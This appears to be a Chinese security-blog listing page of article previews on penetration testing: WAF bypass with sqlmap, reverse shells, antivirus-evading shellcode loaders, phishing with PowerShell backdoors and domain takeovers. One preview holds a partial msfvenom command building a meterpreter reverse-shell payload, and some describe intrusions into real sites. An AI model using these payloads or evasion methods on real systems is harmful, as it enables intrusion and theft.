防封ip解决方案之ip代理池 本项目其实就是个简单的代理服务器，经过我小小的修改。加了个代理池进来。渗透、爬虫的时候很容易就会把自己ip给ban了，所以就需要ip代理池了。______... 2023-3-2 09:11:4 | 阅读: 58 | 收藏 | 编码安全研究 代理 proxy fetcher jhao104 5010

干货分享 | 如何搭建一台永久运行的个人渗透服务器？ 作者 | 彭小呆来源 | https://segmentfault.com/a/1190000021143144No.1 树莓派是什么？Raspberry Pi(中文名为树莓派,简写为 RPi，(或者... 2023-3-1 09:9:45 | 阅读: 47 | 收藏 | 编码安全研究 树莓 ssh 镜像 ngrok 读卡器

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog 0x01 工具介绍此Tamper仅仅适用于MySQL数据库，在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。0x02 安装与使用1、安装网站安全狗Apac... 2023-2-28 09:11:8 | 阅读: 22 | 收藏 | 编码安全研究 tamper sqlmap 60001 安全

关于js拿shell的尝试 以前在测试一个网站的时候，大佬提供了一个拿shell的思路，通过js拿到了shell。当时的情况是这样的，首页为*****/bin/home.php，通过弱口令进入后台，后台所有上传等可以拿shell... 2023-2-27 12:8:39 | 阅读: 24 | 收藏 | 编码安全研究 php 展现出 phptest 数据

记一次bc渗透过狗过火绒经历 事件起因从某个大佬手上获取到含有漏洞指纹信息的bc的cms。于是想尝试一波。通过指纹找一个站点。PS：本文仅用于技术研究与讨论，严禁用于非法用途，违者后果自负开始渗透打开链接，发现是一个登录框，说登录... 2023-2-26 09:11:10 | 阅读: 44 | 收藏 | 编码安全研究 安全 杀死 注册表 传给

分享 | Go编写loader加载shellcode免杀学习 一 简单实现（1）msf生成shellcode，选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.133.... 2023-2-25 09:12:33 | 阅读: 25 | 收藏 | 编码安全研究 shellcode newproc loader

干货｜网络安全资料情报库 这是一个网安人的聚集地～为解决大多粉丝的提问，以及资源需求，特此联合几位师傅创办了知识星球；知识星球已经运营两年，内容大致为：（1）每日分享资料与工具，并进行了分类（2）创办了作业模块，偶尔发布作业与... 2023-2-25 09:12:26 | 阅读: 19 | 收藏 | 编码安全研究 给与 星主 创办 模块 合伙

对某骗子网站的渗透测试 是事出起因，是因为有人找我破解这个软件，顺势就看了下官网：http://www.xxx.com/竟然是有登录框，那我就用抓包来分析下可以看到数据是直接连的115.28.19.219的3306端口，所以... 2023-2-24 09:10:59 | 阅读: 18 | 收藏 | 编码安全研究 数据 账号 数据库 起因

神兵利器 | 红队图形化渗透Tools（附下载） Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化Viper集成杀软绕过,内网隧道,文件管理,命令行等基础功能Viper当前已集成70+个模块,覆盖初始访问/持久化... 2023-2-23 09:9:43 | 阅读: 39 | 收藏 | 编码安全研究 viper 模块 渗透 绕过 横向

实战 | 记一次攻防演练中的溯源经历 缘起在今年的攻防期间，通过安全设备告警分析，需要对某个源攻击IP进行溯源反制，并且需要记录整个溯源过程和提交溯源报告。开展溯源研判在溯源之前，首先应该判断是否真的存在攻击行为，攻击的特征，攻击类型，攻... 2023-2-22 09:10:56 | 阅读: 15 | 收藏 | 编码安全研究 攻击 信息 溯源 攻击者

反弹shell的N种姿势 在渗透测试的过程中，在拿到webshell以后，如果目标主机是Windows主机，则是通过开3389端口在远程连接，如果目标主机是linux服务器，一般我们都会选择反弹shell来进行操作。在这里总结... 2023-2-21 09:12:13 | 阅读: 12 | 收藏 | 编码安全研究 5555 4444 攻击 攻击者 端口

分享 | 文件上传的一个骚操作(低权限+bypassAV) 文章来源：FreeBuf（耳旁的歌）原文地址：https://www.freebuf.com/articles/network/259671.html0x01 前言各位在渗透中是否遇见过这个问题：虽然... 2023-2-20 09:10:49 | 阅读: 161 | 收藏 | 编码安全研究 certutil 拦截 artifact 数据 windows

实战一次真实的域渗透拿下域控 0x01 外网打点最近想练一波内网渗透，于是就fofa批量了一波weblogic，挑了一个国外的机子这里用工具发现存在漏洞CVE-2017-10271和CVE-2019-2725这里我选择了用CVE-... 2023-2-19 09:12:15 | 阅读: 53 | 收藏 | 编码安全研究 机子 横向 上线 信息 ms17010

模拟网站攻击到提权的全部过程 给新一届的学生演示一次网站拿webshell到系统提权的过程，但不幸的是中间翻车了，老年人紧张得忘记了msf监听木马的指令，然后哆哆嗦嗦的在大家眼下，打开了笔记查看一下2333…所以更新一下文章，给自... 2023-2-18 09:10:47 | 阅读: 16 | 收藏 | 编码安全研究 数据 php 数据库 木马 单引号

二十八种未授权访问漏洞合集 | 建议收藏 作者：LuckySec链接：http://luckyzmj.cn/posts/15dff4d3.html这篇文章主要收集一些常见的未授权访问漏洞。未授权访问漏洞可以理解为需要安全配置或权限认证的地址、... 2023-2-17 09:9:46 | 阅读: 22 | 收藏 | 编码安全研究 漏洞 端口 修复 数据 信息

干货 | 渗透中403/401页面绕过的思路总结 0x01 前言做渗透时经常会碰到扫到的资产403的情况，特别是资产微乎其微的情况下，面试有时也会问到，这里做个总结！0x02 利用姿势1.端口利用扫描主机端口，找其它开放web服务的端口，访问其端口，... 2023-2-16 09:10:49 | 阅读: 60 | 收藏 | 编码安全研究 200site 绕过 403 1x github

红蓝对抗之钓鱼篇：常见钓鱼思路总结 1、文档连接钓鱼1）LINK链接钓鱼首先说明一点：ftp加! 可以执行命令首先创建一个ftp的快捷方式，然后新建一个文件名 aaa.dll ，然后内容为cs的后门恶意链接（powershell上线命令... 2023-2-15 09:12:15 | 阅读: 30 | 收藏 | 编码安全研究 chm 钓鱼 github 免杀 powershell

干货｜网络安全资料情报库 这是一个网安人的聚集地～为解决大多粉丝的提问，以及资源需求，特此联合几位师傅创办了知识星球；知识星球已经运营两年，内容大致为：（1）每日分享资料与工具，并进行了分类（2）创办了作业模块，偶尔发布作业与... 2023-2-14 09:11:2 | 阅读: 20 | 收藏 | 编码安全研究 给与 星主 创办 模块 合伙

记一次由sql注入到拿下域控的渗透测试实战演练 本次渗透总流程：1.从一个web页面发现SQL注入并可以通过注入getshell2.通过对webshell的提权成功拿下服务器管理员权限3.通过内网穿透成功连接目标服务器的3389远程桌面服务4.通过... 2023-2-14 09:10:58 | 阅读: 29 | 收藏 | 编码安全研究 mimikatz 端口 远程 haixian 土豆

个人渗透技巧汇总（避坑）笔记 前言首先我们拿到一个站不能心急，凡事三思而行 跑得太快是会滑倒的当我们获得目标的时候不要急着用扫描器，这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录，什么站能扫什么站不能扫，心里一定... 2023-2-13 09:9:46 | 阅读: 93 | 收藏 | 编码安全研究 信息 windows 渗透 漏洞 github